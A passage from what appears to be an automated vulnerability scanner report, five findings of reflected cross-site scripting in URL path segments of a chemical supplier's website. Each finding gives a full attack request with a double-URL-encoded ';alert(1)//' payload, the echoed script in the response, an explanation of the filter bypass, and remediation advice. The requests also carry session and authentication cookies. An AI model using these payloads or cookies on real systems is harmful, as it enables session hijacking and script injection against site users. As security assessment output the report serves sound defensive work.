Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:37 GMT
Content-Length: 28972
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/countries/united-states/press-releasesfd33a";alert(1)//6f95c1398d2/autism-speaks-pr","E404") ;
   </script>
...[SNIP]...

1.259. http://www.sigmaaldrich.com/etc/medialib/countries/united-states/press-releases/autism-speaks-pr [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/countries/united-states/press-releases/autism-speaks-pr

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7585d%2522%253balert%25281%2529%252f%252f31456334c1f was submitted in the REST URL parameter 6. This input was echoed as 7585d";alert(1)//31456334c1f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/countries/united-states/press-releases/autism-speaks-pr7585d%2522%253balert%25281%2529%252f%252f31456334c1f HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:39 GMT
Content-Length: 28972
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/countries/united-states/press-releases/autism-speaks-pr7585d";alert(1)//31456334c1f","E404") ;
   </script>
...[SNIP]...

1.260. http://www.sigmaaldrich.com/etc/medialib/countries/united-states/press-releases/biodegradable-polymers [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/countries/united-states/press-releases/biodegradable-polymers

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8bf52%2522%253balert%25281%2529%252f%252f46061b65483 was submitted in the REST URL parameter 1. This input was echoed as 8bf52";alert(1)//46061b65483 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc8bf52%2522%253balert%25281%2529%252f%252f46061b65483/medialib/countries/united-states/press-releases/biodegradable-polymers HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:04 GMT
Content-Length: 28978
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc8bf52";alert(1)//46061b65483/medialib/countries/united-states/press-releases/biodegradable-polymers","E404") ;
   </script>
...[SNIP]...

1.261. http://www.sigmaaldrich.com/etc/medialib/countries/united-states/press-releases/biodegradable-polymers [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/countries/united-states/press-releases/biodegradable-polymers

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15d84%2522%253balert%25281%2529%252f%252fc733923b809 was submitted in the REST URL parameter 2. This input was echoed as 15d84";alert(1)//c733923b809 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib15d84%2522%253balert%25281%2529%252f%252fc733923b809/countries/united-states/press-releases/biodegradable-polymers HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:10 GMT
Content-Length: 28978
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib15d84";alert(1)//c733923b809/countries/united-states/press-releases/biodegradable-polymers","E404") ;
   </script>
...[SNIP]...

1.262. http://www.sigmaaldrich.com/etc/medialib/countries/united-states/press-releases/biodegradable-polymers [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/countries/united-states/press-releases/biodegradable-polymers

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 18aef%2522%253balert%25281%2529%252f%252f753035582f4 was submitted in the REST URL parameter 3. This input was echoed as 18aef";alert(1)//753035582f4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/countries18aef%2522%253balert%25281%2529%252f%252f753035582f4/united-states/press-releases/biodegradable-polymers HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:16 GMT
Content-Length: 28978
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/countries18aef";alert(1)//753035582f4/united-states/press-releases/biodegradable-polymers","E404") ;
   </script>
...[SNIP]...

1.263. http://www.sigmaaldrich.com/etc/medialib/countries/united-states/press-releases/biodegradable-polymers [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/countries/united-states/press-releases/biodegradable-polymers

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 438be%2522%253balert%25281%2529%252f%252f5ccf57b4760 was submitted in the REST URL parameter 4. This input was echoed as 438be";alert(1)//5ccf57b4760 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/countries/united-states438be%2522%253balert%25281%2529%252f%252f5ccf57b4760/press-releases/biodegradable-polymers HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
